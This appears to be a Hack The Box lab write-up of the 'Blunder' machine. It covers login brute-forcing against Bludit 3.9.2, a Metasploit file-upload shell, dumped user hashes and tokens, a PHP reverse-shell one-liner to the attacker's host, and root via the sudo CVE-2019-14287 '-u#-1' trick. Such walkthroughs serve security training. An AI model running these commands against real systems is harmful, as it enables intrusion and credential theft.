Writeup Hackthebox HTB Blunder
0 - Basic info
OS: Linux
IP: 10.10.10.191
1 - Reconnaissance and enumeration
sudo nmap -sS -sV -sC -O 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 22:24 CEST
Nmap scan report for 10.10.10.191
Host is up (0.041s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%), Netgear RAIDiator 4.2.21 (Linux 2.6.37) (89%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds
The firts scan with Dirbuster, shows the admin page /admin, /todo.txt and the robots.txt:
http://10.10.10.191/admin/
In the admin panel, appears BLUDIT. A quick Googling says that Bludit is a CMS for blogging.
Nothing useful on robots.txt but inside todo.txt there is interesting info:
10.10.10.191/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
The firts user is fergus and Update the CMS is very interesting because maybe there is a flaw discovered by the admin of the site, probably related to outdated software.
So, searching exploits for Bludit:
searchsploit bludit
Bludit - Directory Traversal Image File Upload (Metasploit)
Bludit 3.9.12 - Directory Traversal
bludit Pages Editor 3.0.0 - Arbitrary File Upload
Looking the source code:
<!-- CSS -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2">
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/admin/themes/booty/css/bludit.css?version=3.9.2">
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/admin/themes/booty/css/bludit.bootstrap.css?version=3.9.2">
The Bludit version is 3.9.2
2 - Vulnerability Identification
Also I found:
https://rastating.github.io/bludit-brute-force-mitigation-bypass/
This post is about how to bypass the CSFR token validation to bruteforce Bludit. I can’t use Hydra by default, so I need to find something to bruteforce the admin page.
3 - Exploit
Bludit 3.9.2 exploit:
Using the user Fergus and bruteforcing with the famous wordlist rockyou.txt
python exploit.py 10.10.10.191 fergus /usr/share/wordlists/rockyou.txt
But did not work.
Testing again using a custom wordlist using cewl, because is a Blog and there is a great source of information maybe there is something inside that the blogger used as password.
Custom wordlist
https://tools.kali.org/password-attacks/cewl
cewl -d 2 -m 6 -w docswords.txt 10.10.10.191
And bruteforcing again
python exploit.py 10.10.10.191 fergus custom.txt
[*] Trying: Plugins
[*] Trying: Include
[*] Trying: service
[*] Trying: Stadia
[*] Trying: Dynamic
[*] Trying: blunder
[*] Trying: interesting
[*] Trying: devices
[*] Trying: Google
[*] Trying: content
[*] Trying: created
[*] Trying: Creation
[*] Trying: November
[*] Trying: Reading
[*] Trying: minute
[*] Trying: Awards
[*] Trying: Fantasy
[*] Trying: National
[*] Trying: players
[*] Trying: allows
[*] Trying: stream
[*] Trying: description
[*] Trying: Favicon
[*] Trying: Bootstrap
[*] Trying: bootstrap
[*] Trying: Styles
[*] Trying: Robots
[*] Trying: plugin
[*] Trying: Navbar
[*] Trying: Static
[*] Trying: Social
[*] Trying: Networks
[*] Trying: Content
[*] Trying: Stephen
[*] Trying: Sidebar
[*] Trying: nothing
[*] Trying: Footer
[*] Trying: Copyright
[*] Trying: Powered
[*] Trying: byEgotisticalSW
[*] Trying: Javascript
[*] Trying: American
[*] Trying: fiction
[*] Trying: novels
[*] Trying: feature
[*] Trying: series
[*] Trying: published
[*] Trying: received
[*] Trying: awarded
[*] Trying: literature
[*] Trying: centers
[*] Trying: through
[*] Trying: smartphones
[*] Trying: tablets
[*] Trying: library
[*] Trying: Breaked
[*] Trying: button
[*] Trying: September
[*] Trying: author
[*] Trying: horror
[*] Trying: supernatural
[*] Trying: suspense
[*] Trying: fantasy
[*] Trying: million
[*] Trying: copies
[*] Trying: adapted
[*] Trying: miniseries
[*] Trying: television
[*] Trying: including
[*] Trying: Richard
[*] Trying: Bachman
[*] Trying: written
[*] Trying: approximately
[*] Trying: stories
[*] Trying: collections
[*] Trying: Stoker
[*] Trying: British
[*] Trying: Society
[*] Trying: Foundation
[*] Trying: Distinguished
[*] Trying: Contribution
[*] Trying: Letters
[*] Trying: probably
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain
()
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
()
Great the password is RolandDeschain and I can login into the admin panel.
Metasploit
Now I can use one of the previous exploits. This time I used Metasploit:
linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.5:8443
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading zcoxmsbSZa.png...
[*] Uploading .htaccess...
[*] Executing zcoxmsbSZa.png...
[*] Command shell session 1 opened (10.10.14.5:8443 -> 10.10.10.191:39706) at 2020-07-29 20:18:58 +0200
[+] Deleted .htaccess
pwd
/var/www/bludit-3.9.2/bl-content/tmp
Good, shell access. I am not able to get any user flag, so I need to gain User access.
User hashes
Enumerating the blog source code I found:
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Admin",
"firstName": "Administrator",
"lastName": "",
"role": "admin",
"password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
"salt": "5dde2887e7aca",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""
},
"fergus": {
"firstName": "",
"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
"salt": "jqxpjfnv",
"email": "",
"registered": "2019-11-27 13:26:44",
"tokenRemember": "",
"tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
}
}
Identifying the hashes
2 users with hashes.
Using hash-identifier to identify the hashes:
hash-identifier bfcc887f62e36ea019e3295aafb8a3885966e265
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
Least Possible Hashs:
[+] Tiger-160
[+] Haval-160
[+] RipeMD-160
[+] SHA-1(HMAC)
[+] Tiger-160(HMAC)
[+] RipeMD-160(HMAC)
[+] Haval-160(HMAC)
[+] SHA-1(MaNGOS)
[+] SHA-1(MaNGOS2)
[+] sha1($pass.$salt)
[+] sha1($salt.$pass)
[+] sha1($salt.md5($pass))
[+] sha1($salt.md5($pass).$salt)
[+] sha1($salt.sha1($pass))
[+] sha1($salt.sha1($salt.sha1($pass)))
[+] sha1($username.$pass)
[+] sha1($username.$pass.$salt)
[+] sha1(md5($pass))
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)
--------------------------------------------------
HASH: exit
Not Found.
--------------------------------------------------
But I could not crack the hash or find it on any crackinghash websites.
Hash #2
Enumerating again I found a another version (3.10.0a) of Bludit with another user and pass configuration file:
/var/bludit/3.10.0a/bl-content/databases/users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
New user Hugo with password hash. This time I was lucky and the password is already cracked
Password120
Another reverse shell ?
Great I tried to use the user Hugo but my shell sucks and was unstable…
Started another reverse Shell
nc -lvp 8888
php -r '$sock=fsockopen("10.10.14.5",8888);exec("/bin/sh -i <&3 >&3 2>&3");'
And upgraded the shell with Python:
python3 -c "import pty;pty.spawn('/bin/bash')"
User shell and flag
Now I can log in as Hugo:
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ su - hugo
Password: Password120
hugo@blunder:~$ ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
e0f8[...]d3a5
4 - Post-Exploitation and privilege escalation
This part is about how to get root as Hugo.
I started checking the sudo permissions:
hugo@blunder:/$ sudo -l
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
CVE-2019-14287 sudo
Inmediatly I recognised the flaw and CVE. For sudo 1.8.27
https://access.redhat.com/security/cve/cve-2019-14287
This CVE was very famous because affected a huge number of Linux distributions and is too easy to exploit, because is not handling properly the target ID user when is an invalid user ID like -1, but is necessary to have a rule inside like this:
(ALL, !root) /usr/bin/somecommand
Root shell and flag
Great, because this time means that I can use the ID -1 to execute /bin/bash as root
hugo@blunder:/$ sudo -u#-1 /bin/bash
root@blunder:/# cat /root/root.txt
bcb[...]7d1
Thanks for reading!